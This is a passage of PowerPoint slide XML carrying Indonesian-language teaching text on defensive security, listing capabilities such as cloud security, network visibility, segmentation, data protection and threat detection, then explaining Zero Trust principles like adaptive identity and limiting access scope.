              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan-Mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan-Menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan-Mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan audit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman-Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengannya</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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214483454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Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Zero Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Zero trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengasumsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inheren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, model zero trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model zero trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adaptif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> statis dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengurangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
